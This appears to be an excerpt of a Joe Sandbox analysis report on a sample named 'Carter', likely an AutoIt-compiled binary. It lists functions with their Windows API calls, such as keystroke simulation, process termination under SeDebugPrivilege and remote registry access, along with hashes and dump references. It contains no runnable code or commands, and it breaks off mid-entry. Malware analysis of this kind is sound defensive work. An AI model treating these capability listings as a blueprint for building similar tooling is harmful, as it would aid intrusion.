Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: b77c7316d46fab3e764da8172b05c94a4a6819293e66561791fbfce1e479d355
Instruction ID: f3e1b34890df35ad5364f00a2b06d4fd5855cdc4cd012026eebe75ddf55561e4
Opcode Fuzzy Hash: b77c7316d46fab3e764da8172b05c94a4a6819293e66561791fbfce1e479d355
Instruction Fuzzy Hash: F1415DB150121CBFEB129F90CC89FFB7BACEF08354F108116FA059A195DBB09E459BA5

Function 00AF9330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B10980), ref: 00AF9412
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B10980), ref: 00AF9446
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00AF95C0
SysFreeString.OLEAUT32(?), ref: 00AF95EA

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: f31979dedcc976b43ef01190887b1452df539ad98a61624d28a4599cc4d14679
Instruction ID: afb0fce362716a52ec54aa7f5dce5a1c67cd60de56df3b29e2a76db9242eaee8
Opcode Fuzzy Hash: f31979dedcc976b43ef01190887b1452df539ad98a61624d28a4599cc4d14679
Instruction Fuzzy Hash: 25F12B71A00219EFDB15EF94C884EBEB7B9FF49315F108158FA06AB261DB31AE45CB50

Function 00AE527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AE3B8A,?), ref: 00AE4BE0

Part of subcall function 00AE4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AE3B8A,?), ref: 00AE4BF9

Part of subcall function 00AE4FEC: GetFileAttributesW.KERNEL32(?,00AE3BFE), ref: 00AE4FED

lstrcmpiW.KERNEL32(?,?), ref: 00AE52FB
_wcscmp.LIBCMT ref: 00AE5315
MoveFileW.KERNEL32(?,?), ref: 00AE5330

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: db94134c6f2979e76a1f3f4b333ca3190144b83ebf3f8186c0f914f30dadd11f
Instruction ID: 0f8ceed797422cda88fcb1f5d197956fbc519d2da0b63cc4228659406911557c
Opcode Fuzzy Hash: db94134c6f2979e76a1f3f4b333ca3190144b83ebf3f8186c0f914f30dadd11f
Instruction Fuzzy Hash: C55185B24083859BC724EBA5D9819DFB3EC9F85340F50491EF289C7192EF74E688C756

Function 00B08C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B08D24

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 4b485447003d344c02117d690c30a3de71466c06a817b9c574b2f4f7c79b2ff6
Instruction ID: fd92ffadbe74dda781c8b52993d75b3f925b655a19769331e040901af5bd9e93
Opcode Fuzzy Hash: 4b485447003d344c02117d690c30a3de71466c06a817b9c574b2f4f7c79b2ff6
Instruction Fuzzy Hash: 55519D30640204BFEB30AB24DC89BA93FE4EB15350F6446A5F595EB1E1CF71AA90DB60

Function 00A82F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00ABC638
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00ABC65A
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00ABC672
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00ABC690
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00ABC6B1
DestroyIcon.USER32(00000000), ref: 00ABC6C0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00ABC6DD
DestroyIcon.USER32(?), ref: 00ABC6EC

Part of subcall function 00B0AAD4: DeleteObject.GDI32(00000000), ref: 00B0AB0D

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: d06c0561eda8701d820fb30043e420eeea572904e7689145943900ff2cef0e9a
Instruction ID: 58ada71db408987c1d74797496b2e85620f89e8c3e5f0f1ee8f1cf0ffba1eebd
Opcode Fuzzy Hash: d06c0561eda8701d820fb30043e420eeea572904e7689145943900ff2cef0e9a
Instruction Fuzzy Hash: EA516974610209AFDB20EF25CD55FBA7BB9FB58720F104528F942D7290DBB0ADA0DB50

Function 00ADA226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ADB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADB54D
Part of subcall function 00ADB52D: GetCurrentThreadId.KERNEL32 ref: 00ADB554
Part of subcall function 00ADB52D: AttachThreadInput.USER32(00000000,?,00ADA23B,?,00000001), ref: 00ADB55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 00ADA246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00ADA263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00ADA266
MapVirtualKeyW.USER32(00000025,00000000), ref: 00ADA26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00ADA28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ADA290
MapVirtualKeyW.USER32(00000025,00000000), ref: 00ADA299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00ADA2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ADA2B3

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 690a08fb50f7bcbdcab9f1e7a55296501c1deeae27f41284074409d41dec15f7
Instruction ID: 08b532ea57f0d8a698d811d3734d2de27cde7e310e6cd4b1c9975ff6f53cb84a
Opcode Fuzzy Hash: 690a08fb50f7bcbdcab9f1e7a55296501c1deeae27f41284074409d41dec15f7
Instruction Fuzzy Hash: 0211E5B1560218BEF6106F619C49FAA3B2DEB4C750F514416F3416B1D0CEF35CA09AB0

Function 00AD94D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00AD915A,00000B00,?,?), ref: 00AD94E2
HeapAlloc.KERNEL32(00000000,?,00AD915A,00000B00,?,?), ref: 00AD94E9
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AD915A,00000B00,?,?), ref: 00AD94FE
GetCurrentProcess.KERNEL32(?,00000000,?,00AD915A,00000B00,?,?), ref: 00AD9506
DuplicateHandle.KERNEL32(00000000,?,00AD915A,00000B00,?,?), ref: 00AD9509
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00AD915A,00000B00,?,?), ref: 00AD9519
GetCurrentProcess.KERNEL32(00AD915A,00000000,?,00AD915A,00000B00,?,?), ref: 00AD9521
DuplicateHandle.KERNEL32(00000000,?,00AD915A,00000B00,?,?), ref: 00AD9524
CreateThread.KERNEL32(00000000,00000000,00AD954A,00000000,00000000,00000000), ref: 00AD953E

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: b78b08f7e164e246164e6d6c7fcfce47170e74939587621da82640b5106aacfe
Instruction ID: d456d717ab0480b24aa64196a63620ab91005d3844a10b90fcebc4ee7ce179a4
Opcode Fuzzy Hash: b78b08f7e164e246164e6d6c7fcfce47170e74939587621da82640b5106aacfe
Instruction Fuzzy Hash: 4D01C2B5250304BFE710AF65DC4DFA77B6CEB89711F408411FA05DB191CEB59854CB60

Function 00AFA20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00AFA265
NULL Pointer assignment, xrefs: 00AFA28E, 00AFA5B2

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 0671ddde40db582e70fc76bd7fc14e592c7f490dad2f1ebbecad7dc2e973ca5c
Instruction ID: 634605a488adac29df9a6cfa4bb66736dff66e0a4b3bd08137e597dcacb0260d
Opcode Fuzzy Hash: 0671ddde40db582e70fc76bd7fc14e592c7f490dad2f1ebbecad7dc2e973ca5c
Instruction Fuzzy Hash: 7DC190B1A0021E9FDF10DF98C884AFEB7F5BB58350F148569FA09AB280E770AD45CB51

Function 00AF97FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AF9851
VariantInit.OLEAUT32(?), ref: 00AF9922
VariantInit.OLEAUT32(?), ref: 00AF9A23
VariantClear.OLEAUT32(?), ref: 00AF9A2D
VariantClear.OLEAUT32(?), ref: 00AF9A8A

Strings

Null Object assignment in FOR..IN loop, xrefs: 00AF98B2, 00AF99E0, 00AF9A98
Incorrect Object type in FOR..IN loop, xrefs: 00AF9A06

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 21390e3c69688222603d9723b87a70a5c1fbae96eca3c7b563d0fcc617b4f312
Instruction ID: 2a3bfe6b14dace3bce451bd912604f5ce61b25a3ea672288652ff615b7a62bd6
Opcode Fuzzy Hash: 21390e3c69688222603d9723b87a70a5c1fbae96eca3c7b563d0fcc617b4f312
Instruction Fuzzy Hash: C391AC31A00219ABDF24DFA5C884FAFBBB8EF85750F10855DF615AB290DB709945CFA0

Function 00B073A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B07449
SendMessageW.USER32(?,00001036,00000000,?), ref: 00B0745D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B07477
_wcscat.LIBCMT ref: 00B074D2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00B074E9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B07517

Strings

SysListView32, xrefs: 00B0741B

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 89a5db65e923cd1b715dfb8aacfa14c0414939bbc86f821612e6d3c81b69fd8f
Instruction ID: 2a5752e40e3a375cd9656a09592df6612962578673488ea59cc66b76a78bd75c
Opcode Fuzzy Hash: 89a5db65e923cd1b715dfb8aacfa14c0414939bbc86f821612e6d3c81b69fd8f
Instruction Fuzzy Hash: BC418471944348AFEB219F64CC85BEEBBE8EF08350F10446AF945A72D1DB71AD84CB50

Function 00AFF01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00AE4148: CreateToolhelp32Snapshot.KERNEL32 ref: 00AE416D
Part of subcall function 00AE4148: Process32FirstW.KERNEL32(00000000,?), ref: 00AE417B
Part of subcall function 00AE4148: CloseHandle.KERNEL32(00000000), ref: 00AE4245

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AFF08D
GetLastError.KERNEL32 ref: 00AFF0A0
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AFF0CF
TerminateProcess.KERNEL32(00000000,00000000), ref: 00AFF14C
GetLastError.KERNEL32(00000000), ref: 00AFF157
CloseHandle.KERNEL32(00000000), ref: 00AFF18C

Strings

SeDebugPrivilege, xrefs: 00AFF0AB

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: a0dd3e66a4c73f6b456d1761fbcef9b7f329de2c04bea948051cc4d58e7ba74b
Instruction ID: 706132fc3647137f9300a9c1ed4c0571650cd282e724133cdd8e3b6029bc5c73
Opcode Fuzzy Hash: a0dd3e66a4c73f6b456d1761fbcef9b7f329de2c04bea948051cc4d58e7ba74b
Instruction Fuzzy Hash: 1941DC31200205AFDB25EF64CD96F7DB7A5AF84714F048129FA029F392DFB4A844CB89

Function 00AE34DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00AE357C

Strings

warning, xrefs: 00AE3565
info, xrefs: 00AE351D
question, xrefs: 00AE3535
blank, xrefs: 00AE34FE
stop, xrefs: 00AE354D

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 6c9fc1abf218faf4cd2d1aac0b00ca5464b48f8054779ae154a0aa9662311bdd
Instruction ID: f7c4e2fd1aa69250ed085d11a0a2e951c707f667be0367bef04f72761a4595d6
Opcode Fuzzy Hash: 6c9fc1abf218faf4cd2d1aac0b00ca5464b48f8054779ae154a0aa9662311bdd
Instruction Fuzzy Hash: 4B11E773648786BEAF005B56DC96CAA77ECDF06760F20046AFA00A73C1E7A46F4056B0

Function 00AE47E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00AE4802
LoadStringW.USER32(00000000), ref: 00AE4809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AE481F
LoadStringW.USER32(00000000), ref: 00AE4826
_wprintf.LIBCMT ref: 00AE484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AE486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00AE4847

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 91d75ab74b27f6dff3814e9af40e5b1f4da573ec480bed941b8481197d9fc558
Instruction ID: 62f393965025b3bd26939ad8c7908ccfc71a3fae6e147a3947150712403a0726
Opcode Fuzzy Hash: 91d75ab74b27f6dff3814e9af40e5b1f4da573ec480bed941b8481197d9fc558
Instruction Fuzzy Hash: CB0162F29102487FE711ABA49D89EF6737CEB08301F804595B749E3041EEB49ED44B75

Function 00B0DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3

GetSystemMetrics.USER32(0000000F), ref: 00B0DB42
GetSystemMetrics.USER32(0000000F), ref: 00B0DB62
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B0DD9D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B0DDBB
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B0DDDC
ShowWindow.USER32(00000003,00000000), ref: 00B0DDFB
InvalidateRect.USER32(?,00000000,00000001), ref: 00B0DE20
DefDlgProcW.USER32(?,00000005,?,?), ref: 00B0DE43

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: c5fcf92fa0b62be7b45513c7dc9c20860bdb5db7158ea4cd716632fea54b0bd4
Instruction ID: 11abe4f4336f659226568049e7d6364c9905a41e4a96e80e1878c5dd31315c58
Opcode Fuzzy Hash: c5fcf92fa0b62be7b45513c7dc9c20860bdb5db7158ea4cd716632fea54b0bd4
Instruction Fuzzy Hash: 59B15731600215ABDF14CFA9C9C57A97BF1FF44711F0881A9EC489F2D5DB75A990CB90

Function 00B00371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

Part of subcall function 00B0147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0044E

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: eeca22fb75758fa5bf3075cec5eb761019f1703ed4973df6bd6a74daa77f2526
Instruction ID: 496e6432a89ac6b0507727335a6706db3aac23b0aa4a2ea9a26bb2e0b3c77c7d
Opcode Fuzzy Hash: eeca22fb75758fa5bf3075cec5eb761019f1703ed4973df6bd6a74daa77f2526
Instruction Fuzzy Hash: DAA18A30208201DFCB15EF64C885B6EBBE5EF88314F14895DF9969B2A2DB31E945CF42

Function 00A82E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ABC508,00000004,00000000,00000000,00000000), ref: 00A82E9F
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00ABC508,00000004,00000000,00000000,00000000,000000FF), ref: 00A82EE7
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00ABC508,00000004,00000000,00000000,00000000), ref: 00ABC55B
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ABC508,00000004,00000000,00000000,00000000), ref: 00ABC5C7

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 0c8633cd75e6db4fba437664f5a3ee0f33addd9f08850413a662b3057ce02c18
Instruction ID: 65ac86f134413c2a040586d33fc693631744a20c25408288b90fb1484eb254d1
Opcode Fuzzy Hash: 0c8633cd75e6db4fba437664f5a3ee0f33addd9f08850413a662b3057ce02c18
Instruction Fuzzy Hash: AA412970618680AEDB35BB28CC88BBA7FE6BF91310F64891DE447575A1CB71B980DB14

Function 00AE7681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00AE7698

Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
